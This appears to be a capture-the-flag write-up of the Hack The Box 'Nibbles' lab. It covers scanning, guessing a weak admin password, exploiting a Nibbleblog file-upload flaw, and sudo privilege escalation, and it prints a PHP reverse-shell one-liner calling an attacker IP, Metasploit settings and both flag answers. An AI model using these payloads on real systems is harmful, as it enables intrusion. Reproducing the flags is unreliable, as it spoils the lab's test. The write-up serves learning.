Nibbles (Easy)

Description

  • Difficult -> Easy

  • OS -> Linux

  • State -> Retired

  • Tags -> Vulnerability Assessment / Web Application / Security Tools / Software & OS Exploitation Remote Code Execution / Default Credentials

https://app.hackthebox.com/machines/121/

Write-up

  • I started making an initial port scan using Nmap

nmap 10.129.93.176 -p- -Pn --min-rate 2500 -oN scan.txt

  • Then I did an exhaustive scan to learn about the services running on the open ports

nmap 10.129.93.176 -p22,80 -sVC -oN serv_scan.txt

  • I found the HTTP protocol running on port 80, so I went to check in the browser the content being deployed. All that I saw was a page with a message, so I reviewed the source code to find out more information

To learn more about the HTTP protocol you can go here

  • There I found a comment that let me know there was another page in the route /nibbleblog so I navigated there and found a page with a blog style that I could explore

  • After exploring the page, I didn't find anything relevant, the only hint the site gave me was letting me know the site was powered by the nibbleblog CMS. So, in an attempt to find out possible hidden directories or routes, I fuzzed the route with the help of gobuster and a dictionary from Seclists

gobuster dir -u http://10.129.93.176/nibbleblog -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -o fuzz.txt

  • I found some interesting routes, being the most relevant the /admin.php route, so I navigated there and found a simple login page. I tried using common credentials to log in but it didn't work

  • I needed a username and a password I could log in with, so I went back and checked other found routes looking for this information. I noticed there was a /content route, so I went there to explore it

  • There I found some exposed folders, so I explored the files that were contained there. After examining them I found an interesting file on /content/private/users.xml and accessed it, and noticed this XML document was leaking some information

  • That let me know there was an existing username named admin but it didn't give me any information about a related password, so I kept searching through the files. Then I went to check the config.xml file and noticed the particular use of the nibbles word many times

  • Even the domain of an email was using this word there, so that could mean that was the enterprise name and turned it into a possible option for a weak password. I tried to log in on the /admin.php page using admin as username and nibbles as password and it let me in successfully to a new dashboard

  • After that, I explored the sections of the page searching for any possible vulnerability. As I didn't find anything at first sight, I searched if there were any possible CVEs for this CMS. After a little research, I found a repository with an exploit for the CVE-2015-6967 related to the CMS. That would let me abuse a File Upload vulnerability to gain a reverse shell but I needed to find first a point for uploading a file

To learn more about File Upload exploitation you can go here

  • So I kept looking for an option that could let me upload a file to the system and abuse the vulnerability. After a while, I found there was a Plugins section that could be interesting because sometimes a plugin can be added from external sources, so I accessed it

  • There I found some already installed plugins and after exploring them, the My Image plugin caught my attention because it had an option to upload a picture file, a point that I could abuse

  • To do so, I could create a script for getting a Reverse Shell and upload it into this section. Also, I confirmed that the page is based on PHP with the help of Wappalyazer, so I created a basic script in this programming language with the payload and uploaded it

RevShell.php
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.80 4444 >/tmp/f"); ?>

To learn more about how to create a script for a Reverse Shell you can go here

  • I saw a couple of warnings but the page told me that the file had been uploaded successfully. Then, I had to find out the location where the files were uploaded to execute it. I went back to search and after a while, I found under the /content/private folder, a folder named plugins. Going there I found another folder related to the My Image plugin so I went there to check its content

  • Unfortunately, I found a PHP file named image.php but wasn't the one I had uploaded. Maybe the name had been changed automatically inside the web service, so I tried assuming this only file was the one with my payload for the reverse shell. To confirm this, I created a Netcat listener in my machine on the same port specified in the script and then accessed the file

nc -nvlp 4444

  • I observed the page kept loading and checking the listener I noticed I had successfully caught the shell from the web. Then, I sanitized the terminal and checked which user I was, using the whoami command and with this I knew I was the nibbler user

To learn about the sanitization process you can go here

  • Then I navigated to the /home folder where I found a folder for this user and inside it, a user.txt file from which I got the user flag

  • With that, I got the user flag

Answer: 0ac28aeb5d1e8d1808cdd083961381ad

  • After that, I had to search for a way to escalate privileges. I checked the sudo execution permissions that the user had, and it was able to execute a monitor.sh file. But after searching in the filesystem, I didn't find the file

  • Looking again at the contents of the /home/nibbler folder, I noticed a suspicious Zip file, so I decompressed it and checked its contents, which gave me the monitor.sh file I was looking for

  • Knowing this, I tried modifying the content of the script to spawn a shell. I replaced it and checked it had been saved correctly, which the system let me do without issues. Then I ran the script using sudo and gained the shell as the root user

echo '/bin/bash' > monitor.sh
sudo /monitor.sh

  • Finally, I navigated to the /root folder where I found a root.txt file, and reading its content I got the root flag

  • With that, I got the root flag and pwned the machine

Answer: 817daf6a75543a65762c919ecc5bcb94

Alternative using Metasploit

  • Instead of searching through the web, I could check for known vulnerabilities using Metasploit. First, I started it and searched for vulnerabilities related to nibbleblog

msfconsole
msf6 > search nibbleblog

  • I found an exploit for a File Upload vulnerability existed, so I entered the context of this exploit and found out what parameters I needed to execute it

msf6 > use exploit/multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > show options

  • I provide the asked parameters and run the script

msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.80
msf6 exploit(multi/http/nibbleblog_file_upload) > set LPORT 4444
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.129.93.176
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog

  • After a while, I observed a meterpreter session was spawned, and with this, I gained a shell for the user nibbler. With this, I could continue with the rest of the process

PreviousHTB MachinesNextBountyHunter (Easy)

Last updated